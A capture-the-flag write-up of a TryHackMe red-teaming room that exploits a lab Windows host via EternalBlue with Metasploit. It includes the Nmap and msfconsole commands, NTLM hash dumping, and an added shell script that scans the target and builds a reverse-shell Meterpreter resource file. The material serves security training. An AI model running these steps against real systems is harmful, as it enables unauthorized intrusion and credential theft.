TryHackMe: Intro to C2

Porkballs, published in System Weakness
3 min read, Sep 7, 2022

https://tryhackme.com/room/introtoc2

Learn the essentials of Command and Control to help you become a better Red Teamer and simplify your next Red Team assessment!

This room is part of TryHackMe’s Red Teaming Path!

For this write-up, I’ll focus only on Task 6, as the remaining tasks are theory-based. Do comment if you have trouble with the other tasks and I’ll try my best to help. 😃

Task 6 Command, Control, and Conquer

This task showcases the use of Armitage, but the practice section at the end leaves the choice of tool open:

Practice Time

Now that you have learned how to exploit hosts using Armitage, you will now get to practice your skills by hacking the virtual machine by using Metasploit and Armitage. There are multiple exploit paths that you may be able to follow. We encourage you to explore the various exploit paths you may be able to find in order to gain a better understanding of exploitation and post-exploitation modules in Metasploit and Armitage. As a reminder, Armitage is just Metasploit with a GUI; all the same exploits exist and are categorized the same way.

So I’ll be using Metasploit for this room. 😆

Start the machine and run an initial Nmap scan (note that -A already implies -sC and -sV, so the explicit -sCV below is redundant but harmless):

nmap -sCV -A -Pn -T5 -v MachineIP

The scan reports 32 open ports, but one service caught my attention immediately: SMB, listening on ports 139 and 445.

So let’s run a second Nmap scan with the smb-vuln NSE scripts to see whether the service is vulnerable to any known exploits. The port is 445, not 145, and the glob is quoted so the shell does not try to expand it:

nmap -p 139,445 --script "smb-vuln*" -v MachineIP

And we have a hit! The smb-vuln-ms17-010 script reports the host as VULNERABLE to MS17-010, better known as EternalBlue.

Let’s exploit this using Metasploit. Selecting the module by name is safer than use 0, which only works while the EternalBlue module happens to be the first search result. The listener option is LHOST (not LHOSTS), and Metasploit accepts an interface name such as tun0 in place of your VPN address; run and exploit are interchangeable.

msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS MachineIP
set LHOST tun0
exploit

Once the exploit runs, give it a while for the Meterpreter session to come up; EternalBlue does not always land on the first attempt, so don’t panic if the module reports a retry.

Using this method, the session runs as NT AUTHORITY\SYSTEM straight away (confirm with getuid in Meterpreter), which is the Windows equivalent of root, so we can drop into a shell, navigate to the user’s and Administrator’s desktops and retrieve the flags from there.

shell
CD C:\Users\Administrator\Desktop
type root.txt
CD C:\Users\Ted\Desktop
type user.txt

To get the NTLM hashes, type exit to leave the cmd shell and return to the Meterpreter prompt, then run hashdump. It must be run from Meterpreter, not the shell, and it works here without further privilege escalation because the session is already SYSTEM.
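The whole Task 6 path above, from the SMB vulnerability check to the Metasploit options, wrapped into one script as an added example; this is not part of the original write-up or of the TryHackMe room. MachineIP and tun0 are placeholders you supply on the command line, the Nmap output embedded in the script is a constructed sample used only to exercise the parser, and driving msfconsole with a resource file followed by sessions -i is my own automation rather than something the room prescribes.

```shell
#!/bin/sh
# Added example, not code from the original write-up. Usage:
#   ./eternalblue_check.sh MachineIP tun0
# Nothing is scanned unless both arguments are given.

set -eu

# Constructed sample of what `nmap --script smb-vuln-ms17-010` prints for a
# vulnerable host; the shape follows the script's real output, values are made up.
SAMPLE_NMAP_OUTPUT='Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    Risk factor: HIGH'

# is_ms17_010_vulnerable: read Nmap output on stdin and succeed only if the
# smb-vuln-ms17-010 block itself reports "State: VULNERABLE".
is_ms17_010_vulnerable() {
    awk '
        /smb-vuln-ms17-010:/ { inblock = 1; next }
        inblock && /State: *VULNERABLE/ { found = 1 }
        inblock && /^\|_/ { inblock = 0 }
        END { exit (found ? 0 : 1) }
    '
}

# scan_smb: the two Nmap runs from the write-up, restricted to the SMB ports.
# Port 445 (not 145), and the glob is quoted so the shell does not expand it.
scan_smb() {
    target=$1
    nmap -p 139,445 -sV -Pn -v "$target"
    nmap -p 139,445 --script 'smb-vuln*' -v "$target"
}

# msf_resource: print an msfconsole resource script for the target. The module
# is named explicitly (search ordering can change, so `use 0` is fragile), the
# option is LHOST (singular), and Metasploit resolves an interface name itself.
msf_resource() {
    target=$1
    iface=$2
    cat <<EOF
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $target
set LHOST $iface
set payload windows/x64/meterpreter/reverse_tcp
exploit -z
EOF
}

main() {
    target=$1
    iface=$2
    if scan_smb "$target" | is_ms17_010_vulnerable; then
        msf_resource "$target" "$iface" > eternalblue.rc
        echo "MS17-010 reported VULNERABLE: msfconsole -q -r eternalblue.rc, then sessions -i 1"
    else
        echo "smb-vuln-ms17-010 did not report VULNERABLE; look for another exploit path"
    fi
}

# Only contact a target when a host and an interface are supplied.
if [ "$#" -ge 2 ]; then
    main "$@"
fi
```

The parser keys on the State line inside the smb-vuln-ms17-010 block rather than on the word VULNERABLE anywhere in the output, because the script also prints that word in its description when the host is not affected. The generated resource file uses exploit -z so msfconsole does not drop you into the session automatically; interact with sessions -i 1, run getuid and hashdump from the Meterpreter prompt, and use shell for the flag files as in the write-up.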

And that’s the end of my write-up. Hope you find this useful and let me know if you have problems answering any of the questions found in the room! Thank you for reading. 😄


Budding Cyber Security VAPT Engineer with a deep interest in CTF. Trying to get into doing bug bounty as well XD